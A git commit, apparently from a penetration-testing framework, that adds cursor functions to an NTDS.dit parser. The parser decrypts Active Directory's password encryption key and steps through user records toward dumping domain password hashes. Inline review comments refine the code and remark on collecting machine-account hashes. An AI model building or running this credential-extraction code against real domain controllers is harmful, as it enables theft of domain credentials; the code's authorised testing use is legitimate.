
move to the first user record

move through the datatable until we find
the first SAM user object.

MSP-12356
This commit is contained in:
David Maloney 2015-04-23 16:51:07 -05:00
parent 9d5c3c1610
commit 52571872c4
3 changed files with 50 additions and 0 deletions


@ -67,13 +67,29 @@ DWORD ntds_parse(Remote *remote, Packet *packet){
memset(pekEncrypted, 0, sizeof(encryptedPEK));
memset(pekDecrypted, 0, sizeof(decryptedPEK));
// Get and Decrypt the Password Encryption Key (PEK)
pekStatus = get_PEK(ntdsState, accountColumns, pekEncrypted);
if (pekStatus != JET_errSuccess){
res = pekStatus;
engine_shutdown(ntdsState);
goto out;
}
if (!decrypt_PEK(sysKey, pekEncrypted, pekDecrypted)){
res = GetLastError();
engine_shutdown(ntdsState);
goto out;
}
// Set our Cursor on the first User record
JET_ERR cursorStatus = find_first(ntdsState);
if (cursorStatus != JET_errSuccess){
res = cursorStatus;
engine_shutdown(ntdsState);
goto out;
}
cursorStatus = next_user(ntdsState, accountColumns);
if (cursorStatus != JET_errSuccess){
res = cursorStatus;
engine_shutdown(ntdsState);
goto out;
}
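Review bot: The record that `find_first` positions the cursor on is never inspected, because `next_user` (called right after it) issues a JET_MoveNext before it reads the account type, so a user object sitting in the first row of the table would be skipped. Presumably the first row of the datatable is not a user object in practice, but this pairing depends on that silently; either have `next_user` examine the current row before advancing, or record the assumption above the `find_first` call, e.g. `// the first row is assumed not to be a user object; next_user advances past it before checking the account type`. Note also that `next_user` surfaces end-of-table (JET_errNoCurrentRecord) as an error here, so a database with no matching user object aborts the parse with an ESE error code rather than yielding an empty result — acceptable if intended, but worth a comment next to the `res = cursorStatus;` line. ntds_parse begins before this hunk and continues after it.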


@ -43,6 +43,12 @@ JET_ERR engine_startup(jetState *ntdsState){
return JET_errSuccess;
}
JET_ERR find_first(jetState *ntdsState){
JET_ERR cursorStatus;
cursorStatus = JetMove(ntdsState->jetSession, ntdsState->jetTable, JET_MoveFirst, (JET_GRBIT)NULL);
return cursorStatus;
}
JET_ERR get_column_info(jetState *ntdsState, ntdsColumns *accountColumns){
JET_ERR columnError;
const char attributeNames[][25] = {
@ -109,6 +115,32 @@ JET_ERR get_PEK(jetState *ntdsState, ntdsColumns *accountColumns, encryptedPEK *
return readStatus;
}
JET_ERR next_user(jetState *ntdsState, ntdsColumns *accountColumns){
JET_ERR cursorStatus;
JET_ERR readStatus;
JET_ERR finalStatus = JET_errSuccess;
DWORD accountType = 0;
unsigned long columnSize = 0;
do{
cursorStatus = JetMove(ntdsState->jetSession, ntdsState->jetTable, JET_MoveNext, (JET_GRBIT)NULL);
if (cursorStatus != JET_errSuccess){
finalStatus = cursorStatus;
break;
}
//Retrieve the account type for this row
readStatus = JetRetrieveColumn(ntdsState->jetSession, ntdsState->jetTable, accountColumns->accountType.columnid, &accountType, sizeof(accountType), &columnSize, 0, NULL);
// Unless this is a User Account, then we skip it
if (readStatus == JET_wrnColumnNull){
continue;
}
else if (readStatus != JET_errSuccess){
finalStatus = readStatus;
break;
}
} while (accountType != 0x30000000);
return finalStatus;
}
JET_ERR open_database(jetState *ntdsState){
JET_ERR attachStatus = JetAttachDatabase(ntdsState->jetSession, ntdsState->ntdsPath, JET_bitDbReadOnly);
if (attachStatus != JET_errSuccess){
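Review bot: In `next_user`, `accountType` is not reset at the top of the loop, so when JetRetrieveColumn returns JET_wrnColumnNull the `continue` re-evaluates the `while` condition against the value read from a previous row. That cannot produce a false match today (a matching value would already have ended the loop), but correctness then hinges on the exit condition rather than on the row being tested; add `accountType = 0;` as the first statement of the `do` body. The literal `0x30000000` is the normal-user sAMAccountType and excludes machine (0x30000001) and trust (0x30000002) accounts — give it a name such as `#define SAM_USER_OBJECT 0x30000000` and state in a comment whether skipping computer accounts is intended, since their hashes are often wanted in an NTDS dump. `columnSize` is written by JetRetrieveColumn but never compared against `sizeof(accountType)`; a truncated read comes back as JET_wrnBufferTruncated and is already rejected by the `!= JET_errSuccess` branch, so this is a readability point only. The open_database hunk at the end of this section is cut off, so its body is not reviewed here.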


@ -63,8 +63,10 @@ typedef struct{
JET_ERR engine_shutdown(jetState *ntdsState);
JET_ERR engine_startup(jetState *ntdsState);
JET_ERR find_first(jetState *ntdsState);
JET_ERR get_column_info(jetState *ntdsState, ntdsColumns *accountColumns);
JET_ERR get_PEK(jetState *ntdsState, ntdsColumns *accountColumns, encryptedPEK *pekEncrypted);
JET_ERR next_user(jetState *ntdsState, ntdsColumns *accountColumns);
JET_ERR open_database(jetState *ntdsState);
JET_ERR read_table(jetState *ntdsState, ntdsColumns *accountColumns, decryptedPEK *pekDecrypted);